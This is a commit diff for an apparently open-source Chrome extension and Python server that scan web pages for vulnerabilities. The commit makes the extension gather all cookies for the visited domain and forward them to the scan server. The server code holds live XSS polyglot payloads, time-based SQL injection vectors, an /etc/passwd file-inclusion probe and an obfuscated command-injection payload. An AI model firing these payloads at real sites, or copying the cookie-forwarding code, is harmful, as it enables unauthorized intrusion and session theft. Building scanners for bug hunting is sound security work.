Cookies are now used by the python server

Plugin/background.js

@@ -25,9 +25,9 @@ function extract_domain(url){
  * @param string(impact) - aggressivity of the scan from 0 to 5
  *
  */
-function send_target(server, url, deep, impact){
+function send_target(server, url, deep, impact, cookies){
     var http = new XMLHttpRequest();
-    infos = server + "/?url=" + url + "&deep="+ deep + "&impact=" + impact
+    infos = server + "/?url=" + url + "&deep="+ deep + "&impact=" + impact + "&cookies=" + cookies
 
     // Display the informations sent by the scanner
     http.onreadystatechange = function() {
@@ -92,9 +92,19 @@ chrome.tabs.onActivated.addListener(function(activeInfo) {
 		// Handle start/stop button
     chrome.storage.sync.get(['work'], function(items) {
       if(items['work'] == 1){
-        send_target(config_server, escape(tab.url), 0, 0);
-      }
-    });
 
+        // Extract cookies from the domain
+        var cookies_string = "";  
+        chrome.cookies.getAll({ 'domain': extract_domain(tab.url)}, function(cookies) {
+          for (var i = 0; i < cookies.length; i++) {
+           cookies_string += ("name:" + cookies[i].name + "|value:" + cookies[i].value+"\n");
+          }
+
+          // Start a scan with the url and the cookies
+          send_target(config_server, escape(tab.url), 0, 0, escape((cookies_string)) );
+        });
+      }
+
+    });
 	});
 });

Plugin/manifest.json

@@ -21,7 +21,10 @@
     "activeTab",
     "tabs",
     "notifications",
-    "storage"
+    "storage",
+    "cookies",
+    "http://*/*", 
+    "https://*/*" 
   ],
 
   // Script files
@@ -34,6 +37,7 @@
 
   // Background script to catch new/updated tab
   "background": {
+    "matches": ["<all_urls>"],
     "scripts": ["background.js"]
   }
 

Plugin/vulns.html

@@ -13,7 +13,7 @@
       }
       #info {
         display: block;
-        width: 200px;
+        width: 250px;
         margin: 0 auto;
         text-align: left;
       }

README.md

@@ -6,6 +6,7 @@ Currently it scans for:
 - SQL Injection
 - Cross Site Scripting
 - Local File Inclusion
+- Remote Commands Execution
 
 **Warnings :** Do not use this extension for illegal purpose, the main goal of it is to simplify the life of bug hunters. It's a **BETA version**, many improvements will come don't worry
 
@@ -41,6 +42,7 @@ var config_server = "http://127.0.0.1:8000";
 - Basic page to list the vulnerabilities URL and TYPE
 - Time based SQLi scanner using polyglot vectors (MySQL, SQLite, Oracle, Postgresql, SQL Server)
 - New logo for the extension
+- Re-use your cookies to get access to page with cookie-authentication 
 
 ## TODO - Work in progress
 - Should detect target in source code.. (list of targets, then launch scan)
@@ -48,7 +50,7 @@ var config_server = "http://127.0.0.1:8000";
 - Export function for vulnerabilities
 - Deep and impact : args['url'],args['deep'],args['impact']
 - Launch scan when a button is clicked/ form submitted / page opened via URL - chrome.tabs.onActivated.addListener
-- Cookies and User Agent in server request
+- User Agent in server request
 
 ## Thanks
 - Polyglot vector for SQL injections [The Ultimate SQL Injection Payload](https://labs.detectify.com/2013/05/29/the-ultimate-sql-injection-payload/)

Server/server.py

@@ -13,7 +13,7 @@ firefox = Ghost()
 Description: inject a polyglot vector for XSS in every parameter, then it checks if an alert was triggered
 Parameters: vulns - list of vulnerabilities, url - address of the target, fuzz - parameter we modify
 """
-def scan_xss(vulns, url, fuzz):
+def scan_xss(vulns, url, fuzz, cookie):
 	payload = 'jaVasCript:alert(1)//" name=alert(1) onErrOr=eval(name) src=1 autofocus oNfoCus=eval(name)><marquee><img src=x onerror=alert(1)></marquee>" ></textarea\></|\><details/open/ontoggle=prompt`1` ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>\'-->" ></script><sCrIpt>confirm(1)</scRipt>"><img/id="confirm&lpar; 1)"/alt="/"src="/"onerror=eval(id&%23x29;>\'"><!--'
 	payload1 = 'javascript:/*-->]]>%>?></script></title></textarea></noscript></style></xmp>">[img=1,name=/alert(1)/.source]<img -/style=a:expression&#40&#47&#42\'/-/*&#39,/**/eval(name)/*%2A///*///&#41;;width:100%;height:100%;position:absolute;-ms-behavior:url(#default#time2) name=alert(1) onerror=eval(name) src=1 autofocus onfocus=eval(name) onclick=eval(name) onmouseover=eval(name) onbegin=eval(name) background=javascript:eval(name)//>"'
 
@@ -22,7 +22,7 @@ def scan_xss(vulns, url, fuzz):
 		
 			# Send GET XSS
 			inject = url.replace(fuzz+"=", fuzz+"="+payload)
-			page, extra_resources = session.open(inject)
+			page, extra_resources = session.open(inject, headers={'Cookie':cookie}, user_agent="Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.10 Safari/537.36 OPR/43.0.2442.7 (Edition beta)")
 			result, resources = session.wait_for_alert(1)
 
 			# Detect XSS result with an alert
@@ -41,10 +41,10 @@ def scan_xss(vulns, url, fuzz):
 Description: use a single quote to generate a SQL error in the page
 Parameters: vulns - list of vulnerabilities, url - address of the target, fuzz - parameter we modify
 """
-def scan_sql_error(vulns, url, fuzz):
+def scan_sql_error(vulns, url, fuzz, cookie):
 	payload = "'"
 	inject  = url.replace(fuzz+"=", fuzz+"="+payload)
-	content = requests.get(inject).text
+	content = requests.get(inject, cookies=cookie).text
 
 	if "SQLSTATE[HY000]" in content or "Warning: SQLite3:" in content or "You have an error in your SQL syntax" in content:
 		print "\t\t\033[93mSQLi Detected \033[0m for ", fuzz, " with the payload :", payload
@@ -58,7 +58,7 @@ def scan_sql_error(vulns, url, fuzz):
 Description: use a polyglot vector to detect a SQL injection based on the response time
 Parameters: vulns - list of vulnerabilities, url - address of the target, fuzz - parameter we modify
 """
-def scan_sql_blind_time(vulns, url, fuzz):
+def scan_sql_blind_time(vulns, url, fuzz, cookie):
 	mysql_payload     = "SLEEP(4) /*' || SLEEP(4) || '\" || SLEEP(4) || \"*/"
 	sqlite_payload    = "substr(upper(hex(randomblob(55555555))),0,1) /*' || substr(upper(hex(randomblob(55555555))),0,1) || '\" || substr(upper(hex(randomblob(55555555))),0,1) || \"*/"
 	postgre_payload   = "(SELECT 55555555 FROM PG_SLEEP(4)) /*' || (SELECT 55555555 FROM PG_SLEEP(4)) || '\" || (SELECT 55555555 FROM PG_SLEEP(4)) || \"*/"
@@ -72,7 +72,7 @@ def scan_sql_blind_time(vulns, url, fuzz):
 		# Do a request and check the response time
 		inject  = url.replace(fuzz+"=", fuzz+"="+payload)
 		time1   = datetime.datetime.now()
-		content = requests.get(inject).text
+		content = requests.get(inject, cookies=cookie).text
 		time2   = datetime.datetime.now()
 		diff    = time2 - time1
 		diff    = (divmod(diff.days * 86400 + diff.seconds, 60))[1]
@@ -92,10 +92,10 @@ def scan_sql_blind_time(vulns, url, fuzz):
 Description: will scan every parameter for LFI, checking for the common root:x:0:0
 Parameters: vulns - list of vulnerabilities, url - address of the target, fuzz - parameter we modify
 """
-def scan_lfi(vulns, url, fuzz):
+def scan_lfi(vulns, url, fuzz, cookie):
 	payload = "/etc/passwd"
 	inject  = re.sub(fuzz+"="+"(.[^&]*)", fuzz+"="+payload , url)
-	content = requests.get(inject).text
+	content = requests.get(inject, cookies=cookie).text
 
 	if "root:x:0:0:root:/root:/bin/bash" in content:
 		print "\t\t\033[93mLFI Detected \033[0m for ", fuzz, " with the payload :", payload
@@ -109,7 +109,7 @@ def scan_lfi(vulns, url, fuzz):
 Description: use a polyglot vector to detect a RCE based on the response time
 Parameters: vulns - list of vulnerabilities, url - address of the target, fuzz - parameter we modify
 """
-def scan_rce(vulns, url, fuzz):
+def scan_rce(vulns, url, fuzz, cookie):
 	""" Some tests of context
 	$ time (ping -c 3 127.0.0.1`#'|sleep${IFS}4|'`"|sleep${IFS}4|";sleep${IFS}4 )     -   real	0m4.113s
 	ping: unknown host 127.0.0.1|sleep 	
@@ -123,13 +123,13 @@ def scan_rce(vulns, url, fuzz):
 	;sleep 	
 	4  : commande introuvable
 	"""
-	# Payload URL-encoded of `#'|sleep${IFS}4|'`\"|sleep${IFS}4|\";sleep${IFS}4 "
-	payload = "%60%23%27%7Csleep%24%7BIFS%7D4%7C%27%60%22%7Csleep%24%7BIFS%7D4%7C%22%3Bsleep%24%7BIFS%7D4%20"
+	# Payload URL-encoded of `#'|sleep${IFS}4|'`\"|sleep${IFS}4|\";sleep${IFS}4"
+	payload = "%60%23%27%7Csleep%24%7BIFS%7D4%7C%27%60%22%7Csleep%24%7BIFS%7D4%7C%22%3Bsleep%24%7BIFS%7D4"
 
 	# Do a request and check the response time
 	inject  = url.replace(fuzz+"=", fuzz+"="+payload)
 	time1   = datetime.datetime.now()
-	content = requests.get(inject).text
+	content = requests.get(inject, cookies=cookie).text
 	time2   = datetime.datetime.now()
 	diff    = time2 - time1
 	diff    = (divmod(diff.days * 86400 + diff.seconds, 60))[1]
@@ -160,8 +160,22 @@ def index():
 	vulns = {'rce': 0, 'xss': 0, 'sql': 0, 'lfi': 0, 'list':''}
 	
 	# Parse requests - extract arguments
-	args  = request.args
-	url   = args['url']
+	args    = request.args
+	url     = args['url']
+	
+	# Parse cookies strings - string like name:username|value:admin
+	cookies_requests = {}
+	cookies_ghost    = ""
+	for cookie in args['cookies'].split('\n'):
+
+		c = cookie.split('|')
+		if c != '' and c != None:
+			if len(c) != 1:
+				name  = str(c[0]).replace('name:','')
+				value = str(c[1]).replace('value:','')
+				cookies_requests[name] = value
+				cookies_ghost += " "+cookie.replace('name:','').replace('value:','=').replace('|','') + ";"
+	
 
 	if "?" in url:
 		params  = url.split('?')[1]
@@ -171,13 +185,12 @@ def index():
 		# Launch scans
 		for fuzz in matches:
 			print "\n---[ New parameter " + fuzz + " for url: " + url + " ]---"
-			scan_xss(vulns, url, fuzz)
-			scan_lfi(vulns, url, fuzz)
-			scan_sql_error(vulns, url, fuzz)
-			scan_sql_blind_time(vulns, url, fuzz)
-			scan_rce(vulns, url, fuzz)
+			scan_xss(vulns, url, fuzz, cookies_ghost)
+			scan_lfi(vulns, url, fuzz, cookies_requests)
+			scan_sql_error(vulns, url, fuzz, cookies_requests)
+			scan_sql_blind_time(vulns, url, fuzz, cookies_requests)
+			scan_rce(vulns, url, fuzz, cookies_requests)
 
-	print vulns
 	# Display results as a json
 	return jsonify(vulns)